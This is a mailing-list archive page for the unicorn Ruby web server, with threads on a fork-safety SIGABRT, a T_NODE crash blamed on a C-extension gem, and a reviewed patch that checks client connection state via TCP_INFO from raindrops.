E, [2017-08-04T08:35:28.148339 #95531] ERROR -- : reaped #<Process::Status: pid 95736 SIGABRT (signal 6)> worker=1

I'm not sure if this is something downstream, but I thought I'd bring it to your attention. My temporary solution is to preface my commands with OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES.

Jeffrey

^ permalink raw reply	[relevance 4%]

* Re: Random crash when sending USR2 + QUIT signals to Unicorn process
  2017-07-13 19:34  5% ` Eric Wong
@ 2017-07-14 10:21  0%   ` Pere Joan Martorell
  0 siblings, 0 replies; 200+ results
From: Pere Joan Martorell @ 2017-07-14 10:21 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public, Philip Cunningham, Jonathan del Strother

2017-07-13 21:34 GMT+02:00 Eric Wong <e@80x24.org>:
> +Cc: Philip and Jonathan  since they encountered this three years
> ago, but we never heard back from them:
>
>         https://bogomips.org/unicorn-public/?q=T_NODE+d:..20170713
>
>
> Pere Joan Martorell <pere.joan@camaloon.com> wrote:
>> > /home/deployer/.rbenv/versions/2.4.1/lib/ruby/gems/2.4.0/gems/unicorn-5.3.0/lib/unicorn/http_request.rb:80:in `parse': method `hash' called on unexpected T_NODE object (0x0055b15b973508 flags=0xaa31b) (NotImplementedError)
>
>> Any idea what is happening?
>
> This is most likely a bug in a C extension not using write
> barriers correctly (perhaps via undocumented C-API functions in
> Ruby).
>
> I don't think I've seen this on ruby-core bug reports in a few years:
>
>         https://public-inbox.org/ruby-core/?q=T_NODE
>
> Fwiw, Appendix D on Generational GC in the Ruby source is
> worth reading to any C extension authors:
>
>         https://80x24.org/mirrors/ruby.git/plain/doc/extension.rdoc
>
> There are probably build warnings when using some dangerous methods/macros,
> maybe you can check build logs for const warnings.
>
>
> Can you share the list of RubyGems you have loaded and maybe try
> upgrading/replacing/eliminating the ones with C extensions
> one-by-one until the error stops?

Thank you very much for your fast reply. I'm not using Bundler to
manage my dependencies, but I checked it and there's not any conflict
between gem versions.
Seems that I solved the issue removing some of the gems. This was my gem list:

    cuba -v 3.8.0
    slim -v 3.0.8
    cutest -v 1.2.3
    rack-test -v 0.6.3
    sequel -v 4.46.0
    pg -v 0.20.0
    shotgun -v 0.9.2
    shield -v 2.1.1
    sequel_pg -v 1.6.19
    unicorn -v 5.3.0
    capistrano-rbenv -v 2.1.1

And I finally removed these gems:

    cutest -v 1.2.3
    rack-test -v 0.6.3
    shotgun -v 0.9.2
    sequel_pg -v 1.6.19

I suspect that the conflicting gem was 'sequel_pg' (sequel_pg
overwrites the inner loop of the Sequel postgres adapter row fetching
code with a C version. The C version is significantly faster than the
pure ruby version that Sequel uses by default), but given I didn't
remove these gems one by one I can't completely ensure that.

If the problem reemerges I'll keep you informed.

Thanks!! :)


>
> Also, perhaps the output of "pmap $PID_OF_WORKER" if you're on
> Linux (or equivalent command if you're on another OS).
>
> Anyways, I didn't notice anything suspicious in your config.
>
> I'll do another self-audit of the unicorn + kgio + raindrops
> extensions, too, but judging from the lack of reports and how
> much they get used; I suspect the bug is elsewhere (more eyes
> welcome, of course).
>
> Thanks for the report and any more info you can provide!

^ permalink raw reply	[relevance 0%]

* Re: Random crash when sending USR2 + QUIT signals to Unicorn process
  @ 2017-07-13 19:34  5% ` Eric Wong
  2017-07-14 10:21  0%   ` Pere Joan Martorell
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2017-07-13 19:34 UTC (permalink / raw)
  To: Pere Joan Martorell
  Cc: unicorn-public, Philip Cunningham, Jonathan del Strother

+Cc: Philip and Jonathan  since they encountered this three years
ago, but we never heard back from them:

	https://bogomips.org/unicorn-public/?q=T_NODE+d:..20170713


Pere Joan Martorell <pere.joan@camaloon.com> wrote:
> > /home/deployer/.rbenv/versions/2.4.1/lib/ruby/gems/2.4.0/gems/unicorn-5.3.0/lib/unicorn/http_request.rb:80:in `parse': method `hash' called on unexpected T_NODE object (0x0055b15b973508 flags=0xaa31b) (NotImplementedError)

> Any idea what is happening?

This is most likely a bug in a C extension not using write
barriers correctly (perhaps via undocumented C-API functions in
Ruby).

I don't think I've seen this on ruby-core bug reports in a few years:

	https://public-inbox.org/ruby-core/?q=T_NODE

Fwiw, Appendix D on Generational GC in the Ruby source is
worth reading to any C extension authors:

	https://80x24.org/mirrors/ruby.git/plain/doc/extension.rdoc

There are probably build warnings when using some dangerous methods/macros,
maybe you can check build logs for const warnings.


Can you share the list of RubyGems you have loaded and maybe try
upgrading/replacing/eliminating the ones with C extensions
one-by-one until the error stops?

Also, perhaps the output of "pmap $PID_OF_WORKER" if you're on
Linux (or equivalent command if you're on another OS).

Anyways, I didn't notice anything suspicious in your config.

I'll do another self-audit of the unicorn + kgio + raindrops
extensions, too, but judging from the lack of reports and how
much they get used; I suspect the bug is elsewhere (more eyes
welcome, of course).

Thanks for the report and any more info you can provide!

^ permalink raw reply	[relevance 5%]

* Re: [PATCH] check_client_connection: use tcp state on linux
  2017-03-06 21:32  2%           ` Simon Eskildsen
@ 2017-03-07 22:50  0%             ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2017-03-07 22:50 UTC (permalink / raw)
  To: Simon Eskildsen; +Cc: unicorn-public, Aman Gupta

Simon Eskildsen <simon.eskildsen@shopify.com> wrote:
> Here's another update Eric!

Thanks, a few teeny issues fixed up locally (but commented
inline, below).

However, there's a bigger problem which I'm Cc:-ing Aman about
for tmm1/gctools changing process_client in the internal API.

I won't burden him maintaining extra versions, nor will I force
users to use a certain version of unicorn or gctools to match.

Aman: for reference, relevant messages in the archives:

https://bogomips.org/unicorn-public/?q=d:20170222-+check_client_connection&x=t

(TL;DR: I don't expect Aman will have to do anything,
 just keeping him in the loop)

> +++ b/lib/unicorn/http_server.rb
> @@ -558,8 +558,8 @@ def e100_response_write(client, env)
> 
>    # once a client is accepted, it is processed in its entirety here
>    # in 3 easy steps: read request, call app, write app response
> -  def process_client(client)
> -    status, headers, body = @app.call(env = @request.read(client))
> +  def process_client(client, listener)
> +    status, headers, body = @app.call(env = @request.read(client, listener))

I can squash this fix in, locally:

diff --git a/lib/unicorn/oob_gc.rb b/lib/unicorn/oob_gc.rb
index 5572e59..74a1d51 100644
--- a/lib/unicorn/oob_gc.rb
+++ b/lib/unicorn/oob_gc.rb
@@ -67,8 +67,8 @@ def self.new(app, interval = 5, path = %r{\A/})
 
   #:stopdoc:
   PATH_INFO = "PATH_INFO"
-  def process_client(client)
-    super(client) # Unicorn::HttpServer#process_client
+  def process_client(client, listener)
+    super(client, listener) # Unicorn::HttpServer#process_client
     if OOBGC_PATH =~ OOBGC_ENV[PATH_INFO] && ((@@nr -= 1) <= 0)
       @@nr = OOBGC_INTERVAL
       OOBGC_ENV.clear

However, https://github.com/tmm1/gctools also depends on this
undocumented internal API of ours; and I will not consider
breaking it for release...

Pushed to the "ccc-tcp" branch @ git://bogomips.org/unicorn
(commit beaee769c6553bf4e0260be2507b8235f0aa764f)

>      begin
>        return if @request.hijacked?
> @@ -655,7 +655,7 @@ def worker_loop(worker)
>          # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
>          # but that will return false
>          if client = sock.kgio_tryaccept
> -          process_client(client)
> +          process_client(client, sock)
>            nr += 1
>            worker.tick = time_now.to_i
>          end


> @@ -28,6 +29,7 @@ class Unicorn::HttpParser
>    # Drop these frozen strings when Ruby 2.2 becomes more prevalent,
>    # 2.2+ optimizes hash assignments when used with literal string keys
>    HTTP_RESPONSE_START = [ 'HTTP', '/1.1 ']
> +  EMPTY_ARRAY = [].freeze

(minor) this was made before commit e06b699683738f22
("http_request: freeze constant strings passed IO#write")
but I've trivially fixed it up, locally.

> +    def check_client_connection(socket, listener) # :nodoc:
> +      if Kgio::TCPServer === listener
> +        @@tcp_info ||= Raindrops::TCP_Info.new(socket)
> +        @@tcp_info.get!(socket)
> +        raise Errno::EPIPE, "client closed connection".freeze,
> EMPTY_ARRAY if closed_state?(@@tcp_info.state)

(minor) I needed to wrap that line since I use gigantic fonts
(fixed up locally)

^ permalink raw reply related	[relevance 0%]

* Re: [PATCH] check_client_connection: use tcp state on linux
  @ 2017-03-06 21:32  2%           ` Simon Eskildsen
  2017-03-07 22:50  0%             ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Simon Eskildsen @ 2017-03-06 21:32 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Here's another update Eric!

* Use a frozen empty array and a class variable for TCP_Info to avoid
garbage. As far as I can tell, this shouldn't result in any garbage on
any requests (other than on the first request).
* Pass listener socket to #read to only check the client connection on
a TCP server.
* Short circuit CLOSE_WAIT after ESTABLISHED since in my testing it's
the most common state after ESTABLISHED, it makes the numbers
un-ordered, though. But comment should make it OK.
* Definition of of `check_client_connection` based on whether
Raindrops::TCP_Info is defined, instead of the class variable
approach.
* Changed the unit tests to pass a `nil` listener.

Tested on our staging environment, and still works like a dream.

I should note that I got the idea between this patch into Puma as well!

https://github.com/puma/puma/pull/1227


---
 lib/unicorn/http_request.rb | 44 ++++++++++++++++++++++++++++++++++++++------
 lib/unicorn/http_server.rb  |  6 +++---
 test/unit/test_request.rb   | 28 ++++++++++++++--------------
 3 files changed, 55 insertions(+), 23 deletions(-)

diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index 0c1f9bb..21a99ef 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -2,6 +2,7 @@
 # :enddoc:
 # no stable API here
 require 'unicorn_http'
+require 'raindrops'

 # TODO: remove redundant names
 Unicorn.const_set(:HttpRequest, Unicorn::HttpParser)
@@ -28,6 +29,7 @@ class Unicorn::HttpParser
   # Drop these frozen strings when Ruby 2.2 becomes more prevalent,
   # 2.2+ optimizes hash assignments when used with literal string keys
   HTTP_RESPONSE_START = [ 'HTTP', '/1.1 ']
+  EMPTY_ARRAY = [].freeze
   @@input_class = Unicorn::TeeInput
   @@check_client_connection = false

@@ -62,7 +64,7 @@ def self.check_client_connection=(bool)
   # returns an environment hash suitable for Rack if successful
   # This does minimal exception trapping and it is up to the caller
   # to handle any socket errors (e.g. user aborted upload).
-  def read(socket)
+  def read(socket, listener)
     clear
     e = env

@@ -83,11 +85,7 @@ def read(socket)
       false until add_parse(socket.kgio_read!(16384))
     end

-    # detect if the socket is valid by writing a partial response:
-    if @@check_client_connection && headers?
-      self.response_start_sent = true
-      HTTP_RESPONSE_START.each { |c| socket.write(c) }
-    end
+    check_client_connection(socket, listener) if @@check_client_connection

     e['rack.input'] = 0 == content_length ?
                       NULL_IO : @@input_class.new(socket, self)
@@ -108,4 +106,38 @@ def call
   def hijacked?
     env.include?('rack.hijack_io'.freeze)
   end
+
+  if defined?(Raindrops::TCP_Info)
+    def check_client_connection(socket, listener) # :nodoc:
+      if Kgio::TCPServer === listener
+        @@tcp_info ||= Raindrops::TCP_Info.new(socket)
+        @@tcp_info.get!(socket)
+        raise Errno::EPIPE, "client closed connection".freeze,
EMPTY_ARRAY if closed_state?(@@tcp_info.state)
+      else
+        write_http_header(socket)
+      end
+    end
+
+    def closed_state?(state) # :nodoc:
+      case state
+      when 1 # ESTABLISHED
+        false
+      when 8, 6, 7, 9, 11 # CLOSE_WAIT, TIME_WAIT, CLOSE, LAST_ACK, CLOSING
+        true
+      else
+        false
+      end
+    end
+  else
+    def check_client_connection(socket, listener) # :nodoc:
+      write_http_header(socket)
+    end
+  end
+
+  def write_http_header(socket) # :nodoc:
+    if headers?
+      self.response_start_sent = true
+      HTTP_RESPONSE_START.each { |c| socket.write(c) }
+    end
+  end
 end
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 35bd100..4190641 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -558,8 +558,8 @@ def e100_response_write(client, env)

   # once a client is accepted, it is processed in its entirety here
   # in 3 easy steps: read request, call app, write app response
-  def process_client(client)
-    status, headers, body = @app.call(env = @request.read(client))
+  def process_client(client, listener)
+    status, headers, body = @app.call(env = @request.read(client, listener))

     begin
       return if @request.hijacked?
@@ -655,7 +655,7 @@ def worker_loop(worker)
         # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
         # but that will return false
         if client = sock.kgio_tryaccept
-          process_client(client)
+          process_client(client, sock)
           nr += 1
           worker.tick = time_now.to_i
         end
diff --git a/test/unit/test_request.rb b/test/unit/test_request.rb
index f0ccaf7..dbe8af7 100644
--- a/test/unit/test_request.rb
+++ b/test/unit/test_request.rb
@@ -30,7 +30,7 @@ def setup
   def test_options
     client = MockRequest.new("OPTIONS * HTTP/1.1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert_equal '', env['REQUEST_PATH']
     assert_equal '', env['PATH_INFO']
     assert_equal '*', env['REQUEST_URI']
@@ -40,7 +40,7 @@ def test_options
   def test_absolute_uri_with_query
     client = MockRequest.new("GET http://e:3/x?y=z HTTP/1.1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert_equal '/x', env['REQUEST_PATH']
     assert_equal '/x', env['PATH_INFO']
     assert_equal 'y=z', env['QUERY_STRING']
@@ -50,7 +50,7 @@ def test_absolute_uri_with_query
   def test_absolute_uri_with_fragment
     client = MockRequest.new("GET http://e:3/x#frag HTTP/1.1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert_equal '/x', env['REQUEST_PATH']
     assert_equal '/x', env['PATH_INFO']
     assert_equal '', env['QUERY_STRING']
@@ -61,7 +61,7 @@ def test_absolute_uri_with_fragment
   def test_absolute_uri_with_query_and_fragment
     client = MockRequest.new("GET http://e:3/x?a=b#frag HTTP/1.1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert_equal '/x', env['REQUEST_PATH']
     assert_equal '/x', env['PATH_INFO']
     assert_equal 'a=b', env['QUERY_STRING']
@@ -73,7 +73,7 @@ def test_absolute_uri_unsupported_schemes
     %w(ssh+http://e/ ftp://e/x http+ssh://e/x).each do |abs_uri|
       client = MockRequest.new("GET #{abs_uri} HTTP/1.1\r\n" \
                                "Host: foo\r\n\r\n")
-      assert_raises(HttpParserError) { @request.read(client) }
+      assert_raises(HttpParserError) { @request.read(client, nil) }
     end
   end

@@ -81,7 +81,7 @@ def test_x_forwarded_proto_https
     client = MockRequest.new("GET / HTTP/1.1\r\n" \
                              "X-Forwarded-Proto: https\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert_equal "https", env['rack.url_scheme']
     res = @lint.call(env)
   end
@@ -90,7 +90,7 @@ def test_x_forwarded_proto_http
     client = MockRequest.new("GET / HTTP/1.1\r\n" \
                              "X-Forwarded-Proto: http\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert_equal "http", env['rack.url_scheme']
     res = @lint.call(env)
   end
@@ -99,14 +99,14 @@ def test_x_forwarded_proto_invalid
     client = MockRequest.new("GET / HTTP/1.1\r\n" \
                              "X-Forwarded-Proto: ftp\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert_equal "http", env['rack.url_scheme']
     res = @lint.call(env)
   end

   def test_rack_lint_get
     client = MockRequest.new("GET / HTTP/1.1\r\nHost: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert_equal "http", env['rack.url_scheme']
     assert_equal '127.0.0.1', env['REMOTE_ADDR']
     res = @lint.call(env)
@@ -114,7 +114,7 @@ def test_rack_lint_get

   def test_no_content_stringio
     client = MockRequest.new("GET / HTTP/1.1\r\nHost: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert_equal StringIO, env['rack.input'].class
   end

@@ -122,7 +122,7 @@ def test_zero_content_stringio
     client = MockRequest.new("PUT / HTTP/1.1\r\n" \
                              "Content-Length: 0\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert_equal StringIO, env['rack.input'].class
   end

@@ -130,7 +130,7 @@ def test_real_content_not_stringio
     client = MockRequest.new("PUT / HTTP/1.1\r\n" \
                              "Content-Length: 1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert_equal Unicorn::TeeInput, env['rack.input'].class
   end

@@ -141,7 +141,7 @@ def test_rack_lint_put
       "Content-Length: 5\r\n" \
       "\r\n" \
       "abcde")
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert ! env.include?(:http_body)
     res = @lint.call(env)
   end
@@ -167,7 +167,7 @@ def client.kgio_read!(*args)
       "\r\n")
     count.times { assert_equal bs, client.syswrite(buf) }
     assert_equal 0, client.sysseek(0)
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert ! env.include?(:http_body)
     assert_equal length, env['rack.input'].size
     count.times {
-- 
2.11.0

On Tue, Feb 28, 2017 at 10:18 PM, Eric Wong <e@80x24.org> wrote:
>> Simon Eskildsen <simon.eskildsen@shopify.com> wrote:
>> > +      tcp_info = Raindrops::TCP_Info.new(socket)
>> > +      raise Errno::EPIPE, "client closed connection".freeze, [] if
>> > closed_state?(tcp_info.state)
>
> Also, I guess if you're using this frequently, it might make
> sense to keep the tcp_info object around and recycle it
> using the Raindrops::TCP_Info#get! method.
>
> #get! has always been supported in raindrops, but I just noticed
> RDoc wasn't picking it up properly :x
>
> Anyways I've fixed the documentation over on the raindrops list
>
>   https://bogomips.org/raindrops-public/20170301025541.26183-1-e@80x24.org/
>   ("[PATCH] ext: fix documentation for C ext-defined classes")
>
>   https://bogomips.org/raindrops-public/20170301025546.26233-1-e@80x24.org/
>   ("[PATCH] TCP_Info: custom documentation for #get!")
>
> ... and updated the RDoc on https://bogomips.org/raindrops/
>
> Heck, I wonder if it even makes sense to reuse a frozen empty
> Array when raising the exception...

^ permalink raw reply related	[relevance 2%]

* Re: [PATCH] check_client_connection: use tcp state on linux
  2017-02-25 16:19  0% ` Simon Eskildsen
@ 2017-02-25 23:12  0%   ` Eric Wong
    0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2017-02-25 23:12 UTC (permalink / raw)
  To: Simon Eskildsen; +Cc: unicorn-public

Simon Eskildsen <simon.eskildsen@shopify.com> wrote:
 
> On Sat, Feb 25, 2017 at 9:03 AM, Simon Eskildsen
> <simon.eskildsen@shopify.com> wrote:
> > The implementation of the check_client_connection causing an early write is
> > ineffective when not performed on loopback. In my testing, when on non-loopback,
> > such as another host, we only see a 10-20% rejection rate with TCP_NODELAY of
> > clients that are closed. This means 90-80% of responses in this case are
> > rendered in vain.
> >
> > This patch uses getosockopt(2) with TCP_INFO on Linux to read the socket state.
> > If the socket is in a state where it doesn't take a response, we'll abort the
> > request with a similar error as to what write(2) would give us on a closed
> > socket in case of an error.
> >
> > In my testing, this has a 100% rejection rate. This testing was conducted with
> > the following script:

Good to know!

> > diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
> > index 0c1f9bb..b4c95fc 100644
> > --- a/lib/unicorn/http_request.rb
> > +++ b/lib/unicorn/http_request.rb
> > @@ -31,6 +31,9 @@ class Unicorn::HttpParser
> >    @@input_class = Unicorn::TeeInput
> >    @@check_client_connection = false
> >
> > +  # TCP_TIME_WAIT: 6, TCP_CLOSE: 7, TCP_CLOSE_WAIT: 8, TCP_LAST_ACK: 9
> > +  IGNORED_CHECK_CLIENT_SOCKET_STATES = (6..9)

Thanks for documenting the numbers.

I prefer we use a hash or case statement.  Both allow more
optimization in the YARV VM of CRuby (opt_aref and
opt_case_dispatch in insns.def).  case _might_ be a little
faster if there's no constant lookup overhead, but 
a microbench or dumping the bytecode will be necessary
to be sure :)

A hash or a case can also help portability-wise in case
we hit a system where these numbers are non-sequential;
or if we forgot something.

> > -    # detect if the socket is valid by writing a partial response:
> > -    if @@check_client_connection && headers?
> > -      self.response_start_sent = true
> > -      HTTP_RESPONSE_START.each { |c| socket.write(c) }
> > +    # detect if the socket is valid by checking client connection.
> > +    if @@check_client_connection

We can probably split everything inside this if to a new
method, this avoid penalizing people who don't use this feature.
Using check_client_connection will already have a high cost,
since it requires at least one extra syscall.

> > +      if defined?(Raindrops::TCP_Info)

...because defined? only needs to be checked once for the
lifetime of the process; we can define different methods
at load time to avoid the check for each and every request.

> > +        tcp_info = Raindrops::TCP_Info.new(socket)
> > +        if IGNORED_CHECK_CLIENT_SOCKET_STATES.cover?(tcp_info.state)
> > +          socket.close

Right, no need to socket.close, here; handle_error does it.

> > +          raise Errno::EPIPE

Since we don't print out the backtrace in handle_error, we
can raise without a backtrace to avoid excess garbage.

> > +        end
> > +      elsif headers?
> > +        self.response_start_sent = true
> > +        HTTP_RESPONSE_START.each { |c| socket.write(c) }
> > +      end
> >      end

> I left out a TCPSocket check, we'll need a `socket.is_a?(TCPSocket)`
> in there. I'll wait with sending an updated patch in case you have
> other comments. I'm also not entirely sure we need the `socket.close`.
> What do you think?

Yep, we need to account for the UNIX socket case.  I forget if
kgio even makes them different...

Anyways I won't be online much for a few days, and it's the
weekend, so no rush :)

Thanks.

^ permalink raw reply	[relevance 0%]

* Re: [PATCH] check_client_connection: use tcp state on linux
  2017-02-25 14:03  4% [PATCH] check_client_connection: use tcp state on linux Simon Eskildsen
@ 2017-02-25 16:19  0% ` Simon Eskildsen
  2017-02-25 23:12  0%   ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Simon Eskildsen @ 2017-02-25 16:19 UTC (permalink / raw)
  To: unicorn-public

I left out a TCPSocket check, we'll need a `socket.is_a?(TCPSocket)`
in there. I'll wait with sending an updated patch in case you have
other comments. I'm also not entirely sure we need the `socket.close`.
What do you think?

On Sat, Feb 25, 2017 at 9:03 AM, Simon Eskildsen
<simon.eskildsen@shopify.com> wrote:
> The implementation of the check_client_connection causing an early write is
> ineffective when not performed on loopback. In my testing, when on non-loopback,
> such as another host, we only see a 10-20% rejection rate with TCP_NODELAY of
> clients that are closed. This means 90-80% of responses in this case are
> rendered in vain.
>
> This patch uses getosockopt(2) with TCP_INFO on Linux to read the socket state.
> If the socket is in a state where it doesn't take a response, we'll abort the
> request with a similar error as to what write(2) would give us on a closed
> socket in case of an error.
>
> In my testing, this has a 100% rejection rate. This testing was conducted with
> the following script:
>
> 100.times do |i|
>   client = TCPSocket.new("some-unicorn", 20_000)
>   client.write("GET /collections/#{rand(10000)}
> HTTP/1.1\r\nHost:walrusser.myshopify.com\r\n\r\n")
>   client.close
> end
> ---
>  lib/unicorn/http_request.rb | 19 +++++++++++++++----
>  1 file changed, 15 insertions(+), 4 deletions(-)
>
> diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
> index 0c1f9bb..b4c95fc 100644
> --- a/lib/unicorn/http_request.rb
> +++ b/lib/unicorn/http_request.rb
> @@ -31,6 +31,9 @@ class Unicorn::HttpParser
>    @@input_class = Unicorn::TeeInput
>    @@check_client_connection = false
>
> +  # TCP_TIME_WAIT: 6, TCP_CLOSE: 7, TCP_CLOSE_WAIT: 8, TCP_LAST_ACK: 9
> +  IGNORED_CHECK_CLIENT_SOCKET_STATES = (6..9)
> +
>    def self.input_class
>      @@input_class
>    end
> @@ -83,10 +86,18 @@ def read(socket)
>        false until add_parse(socket.kgio_read!(16384))
>      end
>
> -    # detect if the socket is valid by writing a partial response:
> -    if @@check_client_connection && headers?
> -      self.response_start_sent = true
> -      HTTP_RESPONSE_START.each { |c| socket.write(c) }
> +    # detect if the socket is valid by checking client connection.
> +    if @@check_client_connection
> +      if defined?(Raindrops::TCP_Info)
> +        tcp_info = Raindrops::TCP_Info.new(socket)
> +        if IGNORED_CHECK_CLIENT_SOCKET_STATES.cover?(tcp_info.state)
> +          socket.close
> +          raise Errno::EPIPE
> +        end
> +      elsif headers?
> +        self.response_start_sent = true
> +        HTTP_RESPONSE_START.each { |c| socket.write(c) }
> +      end
>      end
>
>      e['rack.input'] = 0 == content_length ?
> --
> 2.11.0

^ permalink raw reply	[relevance 0%]

* [PATCH] check_client_connection: use tcp state on linux
@ 2017-02-25 14:03  4% Simon Eskildsen
  2017-02-25 16:19  0% ` Simon Eskildsen
  0 siblings, 1 reply; 200+ results
From: Simon Eskildsen @ 2017-02-25 14:03 UTC (permalink / raw)
  To: unicorn-public

The implementation of the check_client_connection causing an early write is
ineffective when not performed on loopback. In my testing, when on non-loopback,
such as another host, we only see a 10-20% rejection rate with TCP_NODELAY of
clients that are closed. This means 90-80% of responses in this case are
rendered in vain.

This patch uses getosockopt(2) with TCP_INFO on Linux to read the socket state.
If the socket is in a state where it doesn't take a response, we'll abort the
request with a similar error as to what write(2) would give us on a closed
socket in case of an error.

In my testing, this has a 100% rejection rate. This testing was conducted with
the following script:

100.times do |i|
  client = TCPSocket.new("some-unicorn", 20_000)
  client.write("GET /collections/#{rand(10000)}
HTTP/1.1\r\nHost:walrusser.myshopify.com\r\n\r\n")
  client.close
end
---
 lib/unicorn/http_request.rb | 19 +++++++++++++++----
 1 file changed, 15 insertions(+), 4 deletions(-)

diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index 0c1f9bb..b4c95fc 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -31,6 +31,9 @@ class Unicorn::HttpParser
   @@input_class = Unicorn::TeeInput
   @@check_client_connection = false

+  # TCP_TIME_WAIT: 6, TCP_CLOSE: 7, TCP_CLOSE_WAIT: 8, TCP_LAST_ACK: 9
+  IGNORED_CHECK_CLIENT_SOCKET_STATES = (6..9)
+
   def self.input_class
     @@input_class
   end
@@ -83,10 +86,18 @@ def read(socket)
       false until add_parse(socket.kgio_read!(16384))
     end

-    # detect if the socket is valid by writing a partial response:
-    if @@check_client_connection && headers?
-      self.response_start_sent = true
-      HTTP_RESPONSE_START.each { |c| socket.write(c) }
+    # detect if the socket is valid by checking client connection.
+    if @@check_client_connection
+      if defined?(Raindrops::TCP_Info)
+        tcp_info = Raindrops::TCP_Info.new(socket)
+        if IGNORED_CHECK_CLIENT_SOCKET_STATES.cover?(tcp_info.state)
+          socket.close
+          raise Errno::EPIPE
+        end
+      elsif headers?
+        self.response_start_sent = true
+        HTTP_RESPONSE_START.each { |c| socket.write(c) }
+      end
     end

     e['rack.input'] = 0 == content_length ?
-- 
2.11.0

^ permalink raw reply related	[relevance 4%]

* Re: check_client_connection using getsockopt(2)
  2017-02-23  2:42  0%       ` Simon Eskildsen
@ 2017-02-23  3:52  5%         ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2017-02-23  3:52 UTC (permalink / raw)
  To: Simon Eskildsen; +Cc: unicorn-public, raindrops-public

Simon Eskildsen <simon.eskildsen@shopify.com> wrote:
> On Wed, Feb 22, 2017 at 8:42 PM, Eric Wong <e@80x24.org> wrote:
> > Simon Eskildsen <simon.eskildsen@shopify.com> wrote:
> >> I meant to ask, in Raindrops why do you use the netlink API to get the
> >> socket backlog instead of `getsockopt(2)` with `TCP_INFO` to get
> >> `tcpi_unacked`? (as described in
> >> http://www.ryanfrantz.com/posts/apache-tcp-backlog/) We use this to
> >> monitor socket backlogs with a sidekick Ruby daemon. Although we're
> >> looking to replace it with a middleware to simplify for Kubernetes.
> >> It's one of our main metrics for monitoring performance, especially
> >> around deploys.
> >
> > The netlink API allows independently-spawned processes to
> > monitor others; so it can be system-wide.  TCP_INFO requires the
> > process doing the checking to also have the socket open.
> >
> > I guess this reasoning for using netlink is invalid for containers,
> > though...
> 
> If you namespace the network it's problematic, yeah. I'm considering
> right now putting Raindrops in a middleware with the netlink API
> inside the container, but it feels weird. That said, if you consider
> the alternative of using `getsockopt(2)` on the listening socket, I
> don't know how you'd get access to the Unicorn listening socket from a
> middleware. Would it be nuts to expose a hook in Unicorn that allows
> periodic execution for monitoring listening stats from Raindrops on
> the listening socket? It seems somewhat of a narrow use-case, but on
> the other hand I'm also not a fan of doing
> `Raindrops::Linux.tcp_listener_stats("localhost:#{ENV["PORT"}")`, but
> that might be less ugly.

Yeah, all options get pretty ugly since Rack doesn't expose that
in a standardized way.  Unicorn::HttpServer::LISTENERS is a
historical constant which stores all listeners used by some
parts of raindrops.

Maybe relying on ObjectSpace or walking the LISTEN_FDS env from
systemd is acceptable for other servers *shrug*


Another way might be to rely on tcpi_last_data_recv in struct
tcp_info from each and every client socket.  That should tell
you when a client stopped writing to the socket, which works for
most HTTP requests.  You could use the same getsockopt() call
you'd use for check_client_connection to read that field.

However, this won't be visible until the client is accept()ed.

raindrops actually has some support for this, but it was
ugly, too (hooking into *accept* methods):
https://bogomips.org/raindrops/Raindrops/LastDataRecv.html

Perhaps refinements could be used, nowadays (I've never used
them).  Just throwing options out there...


In any case, what I definitely do not want is to introduced more
specialized configuration or API which might lock people into
unicorn or having to burden people with versioning incompatibilies.

> > (*) So I've been wondering if adding a "unicorn-mode" to an
> >     existing C10K, slow-client-capable Ruby/Rack server +
> >     reverse proxy makes sense for containerized deploys.
> >     Maybe...
> 
> I'd love to hear more about this idea. What are you contemplating?

Maybe another time, and not on the unicorn list.  I don't feel
comfortable writing about unrelated/tangential projects on the
unicorn list, even if I'm the leader of both projects.  Anyways,
this other server is also in the rack README.md and I've been
announcing it on ruby-talk since 2013.

^ permalink raw reply	[relevance 5%]

* Re: check_client_connection using getsockopt(2)
  2017-02-23  1:42  4%     ` Eric Wong
@ 2017-02-23  2:42  0%       ` Simon Eskildsen
  2017-02-23  3:52  5%         ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Simon Eskildsen @ 2017-02-23  2:42 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public, raindrops-public

